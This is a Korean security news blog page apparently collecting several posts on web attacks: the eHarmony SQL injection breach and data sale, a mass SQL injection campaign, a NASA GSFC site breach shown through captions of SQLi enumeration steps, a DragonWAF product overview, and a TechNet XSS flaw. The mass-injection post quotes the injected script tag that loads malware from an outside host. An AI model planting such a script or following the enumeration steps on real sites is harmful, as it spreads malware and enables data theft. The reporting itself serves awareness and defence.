지난 2월 초에 온라인 데이트 사이트인 PlentofFish(POF)가 해킹을 당해 약 2800만 건의 데이터가 누출되었다고 알려드린 적이 있습니다.
인터넷 불륜 사이트, 해킹으로 2,800만 이용자들 화들짝! 놀라
http://moonslab.com/1250

그런데, POF를 해킹한 아르헨티나 해커인 Chris Rosso는 이번에는 eHarmony 사이트를 해킹하여 서버 정보 뿐만 아니라 수천명의 개인 정보까지 보유하고 있으며, 이 사이트를 판매한다는 광고까지 내건것으로 확인되고 있습니다.


위의 하면은 carder.biz 포럼에 올려진 글이며, 이와 별개로 diversitybusiness.com의 150만개의 개인정보를 1,500 달러에 판매한다는 글, pixmania.com, eidos.com 등에 대한 것들도 올라와 있습니다.

eHarmony의 기술 담당자인 Joseph Essas에 따르면 Russo는 advice.eharmony.com에서 사용하는 서드파티 라이브러리 중 하나에서 SQL Injection 취약점을 발견하였으며 이를 이용하여 공격한 것이라고 밝혔습니다.

또한 Russo는 보안 서비스를 받도록 요구한 바가 있으며 이는 POF와 동일한 사례로 보입니다.

이와 같이 최근에는 데이터베이스가 알차다고(!) 여겨지는 사이트의 해킹이 줄을 잇고 있으며 이러한 해킹의 주요한 원인은 SQL 인젝션 취약점으로, 앞으로도 개선할 부분이 많으며, 꾸준히 이러한 문제가 나타날 것으로 예상됩니다.

감사합니다.

출처: http://krebsonsecurity.com/2011/02/eharmony-hacked/?utm_medium=twitter&utm_campaign=winsec&utm_source=%40winsec
reTweet
Posted by 문스랩닷컴
blog comments powered by Disqus
    외국에 위치하고 있는 보안 기업인 ScanSafe는 자사의 블로그를 통해 대규모의 SQL 인젝션 공격이 발생했다는 사실을 밝혔습니다.

    블로그에 따르면 이번 주 초부터 발생한 공격으로 월스트리트 저널, 예루살렘 포스트 등을 포함한 약 7천여개의 웹사이트가 침해되었습니다.

    공격은 이미 널리 알려져 있는 SQL 인젝션 취약점을 이용한 것으로 취약점이 있는 서버의 데이터베이스에 아래의 스크립트를 삽입하는 방식으로 진행되었습니다

    script src=http://ww.robint.us/u.js

    이 스크립트는 악성 코드가 포함되어 있는 웹서버에서 PC로 악성 코드를 자동으로 다운로드하도록 하는 것으로 백신이나 보안 패치가 부족한 PC에서 특히 위험합니다.

    한편 이번에 발생한 공격은 윈도우 서버 플랫폼 즉, IIS/ASP.NET 기반으로 개발된 웹사이트를 주 공격대상으로 삼고 있었습니다.

    월스트리트 저널의 경우에는 adicio.com 이라는 제휴 회사의 침해로 인해 WSJ.com 홈페이지의 특정 페이지에 공격이 나타나는 현상이 발생했습니다.

    공격받은 대부분의 웹사이트에서 악성 스크립트는 이미 제거된 상태이지만, 아직까지도 수천개 이상의 사이트들에서는 해결이 되지 않은 상태입니다.

    SQL 인젝션 취약점은 소스 코드에서 입/출력되는 값이 적절한지 검증을 거치지 않아 발생하는 것입니다. 따라서, 소스 수준에서 문제점을 해결해야만 이와 같은 공격으로부터 자유로울 수 있습니다.

    물론, WAF(웹 애플리케이션 파이워월)와 같은 보안 장비(소프트웨어)를 사용할 수 있지만, 새로운 유형의 공격 형태가 나타날 경우에는 또다시 문제가 될 소지가 많습니다. 따라서, 근본적으로 해결을 해야 합니다.

    출처: http://blog.scansafe.com/

    reTweet
    Posted by 문스랩닷컴
    blog comments powered by Disqus
      최근 외국의 해커들은 유명한 회사나 기관의 웹사이트를 해킹하여 자신이 소유한 블로그에 게시하는 경우가 많습니다. 블로그에서도 여러번 소개한 적이 있습니다만, 이번에는 TinCode 라는 루마니아 계의 해커가 저지른 사건입니다.

      문제가 발생한 사이트는 미항공우주국(NASA)의 Goddard Space Flight Center(GSFC)의 에어로졸 연구에 관련된 것으로 KinCode는 aerocenter.gsfc.nasa.gov  사이트의 보안이 되어 있지만, 완벽하지 않다고 하면서 이번 해킹은 매우 어려운 것이었다고 털어 놓았습니다.

      아래는 해킹을 한 화면들입니다.
      <화면 1. SQLi 취약점을 확인>

      <화면 2. 데이터베이스의 버전 확인>

      <화면 3. 모든 데이터베이스의 이름 확인>

      <화면 4. 모든 테이블 확인>

      <화면 5. 관리자 계정의 비밀번호 확인>

      위의 화면에서 관리자의 비밀번호는 MD5로 암호화되어 저장되는 것을 알 수 있으며, MD5는 시간만 약간 들인다면 충분히 깰 수 있는 암호체계입니다.

      한편, NASA는 기존에도 여러 번 해킹을 당해 뉴스에 언급된 적이 있습니다. 하지만,  NASA와 같이 거대한 조직에서 완벽한 보안을 유지하는 것은 매우 어려운 일이라고 생각됩니다.

      KinCode의 블로그: http://tinkode.baywords.com/index.php/2010/01/the-center-for-aerosol-research-nasa-website-security-issues/

      감사합니다.
      reTweet
      Posted by 문스랩닷컴
      blog comments powered by Disqus
        최근의 공격 성향을 보면, 일반 OS나 네트워크 단의 공격보다는 웹을 기반으로 하는 공격이 증가하고 있으며, 특히 치명적인 영향을 미치는 것이 특징입니다.

        이러한 웹에 관련된 취약점은 대부분 소스를 보안에 맞게 작성하지 않아서 발생합니다. 따라서, SQL 인젝션이나 XSS 공격 등을 차단하기 위해서는 소스를 수정해야 하지만, 현실적으로 소스를 신속하게 수정하기란 어렵습니다. 또한, 사이트가 계속 변경되고 발전되어 간다면 이 과정에서 소스를 수정하기도 힘듭니다.

        이러한 경우에는 WAF(Web Application Firewall)이라는 장치를 사용하여 웹 서버의 앞단에서 웹 공격으로 판단되는 패킷(요청)을 차단하는 새로운 형태의 보안 서비스가 출시되어 사용되고 있습니다.

        WAF에는 하드웨어 즉 장비 기반이 있고, 소프트웨어로 운영 체제 내에서 프로그램으로 돌아가는 형태가 있습니다. 하드웨어 기반은 가격이 비싼데 반해, 다양한 서버를 통합적으로 커버할 수 있다는 장점이 있습니다. 소프트웨어 기반은 가격은 저렴하지만 서버마다 설치하여 운영해야 하는 관리적인 부담이 있습니다.

        지금 소개하려는 제품은 소프트웨어 웹 방화벽 중 하나인 DragonWAF 입니다. 이 제품은 중국에서 개발된 것으로 알려져 있습니다. 지원하는 운영체제 및 IIS 버전은 다음과 같습니다.
        • 윈도우 NT - IIS 4.0
        • 윈도우 2000 - IIS 5.0
        • 윈도우 XP 프로페셔널 - IIS 5.1
        • 윈도우 2003 - IIS 6.0

        하지만 윈도우 2008에서 제공하는 IIS 7.0은 아직 지원하지 않습니다.

        DragonWAF에서 차단할 수 있는 웹 공격의 유형은 다음과 같습니다.

        1. SQL Injection
        2. Server-Side Include
        3. Directory Indexing
        4. Path Traversal
        5. Cross-Site Scripting
        6. Buffer Overflow
        7. LDAP Injection
        8. Phishing
        9. HTTP Response Splitting
        10. Content Spoofing
        11. Predictable Resource Location
        12. Denial of Service
        13. Application Fingerprinting
        14. Insufficient Session Expiration
        15. Session Fixation
        16. Web Server Fingerprinting
        17. Abuse of Functionality (emails, spiders, data theft)
        18. Command Injection

        사용자 인터페이스는 중국에서 만든 관계로 중국어(간체, 번체)와 영어를 지원하지만, 한국어는 별도로 지원하지 않습니다.

        마지막으로 일반 소프트웨어 제품과 마찬가지로 평가판을 제공하고 있습니다. 평가판은 아래 링크에서 일정 양식을 입력한 후에 사용하실 수 있습니다.

        http://www.dragonsoft.com/FreeTool/WAF/validation.php

        감사합니다.

        reTweet
        Posted by 문스랩닷컴
        blog comments powered by Disqus
          최근 시만텍, 잉카인터넷 등과 같이 대형 또는 보안 회사들의 웹사이트에 취약점이 발견되어 한바탕 소동이 난 적이 있습니다.

          이번에는 기술 자료의 보고인 MS 테크넷(TechNet) 사이트 내에 있는 스크립트 센터 갤러리에서 XSS 취약점이 발견되었습니다.

          http://gallery.technet.microsoft.com/ScriptCenter/en-us/site/search?f%5B0%5D.Type='Tag&f%5B0%5D.Value=XSS 


          테크넷의 XSS 취약점을 밝혀낸 사람은 TeamElite라고 하는 해킹 그룹이며, 이 그룹은 WHO, 플레이보이 루마니아, TwitterCounter.com, 뉴욕타임즈, AVG 불가리아, Telegraph.co.uk 등과 같은 사이트의 취약점을 공개한 적이 있습니다.

          <그림 1. XSS 취약점을 이용하여 특정 문자열을 팝업 창으로 표시하는 전형적인 시연 화면>

          <그림 2. 구글 페이지를 임베디드한 화면>

          참고로, XSS 취약점은 SQL Injection 공격과 함께 인터넷 상에서 가장 많이 공격하는 취약점으로 OWASP에서 수위를 차지합니다.

          출처: http://security-sh3ll.blogspot.com/2009/11/microsoft-technet-vulnerable-to-cross.html
          reTweet
          Posted by 문스랩닷컴
          blog comments powered by Disqus


            Web Analytics Blogs Directory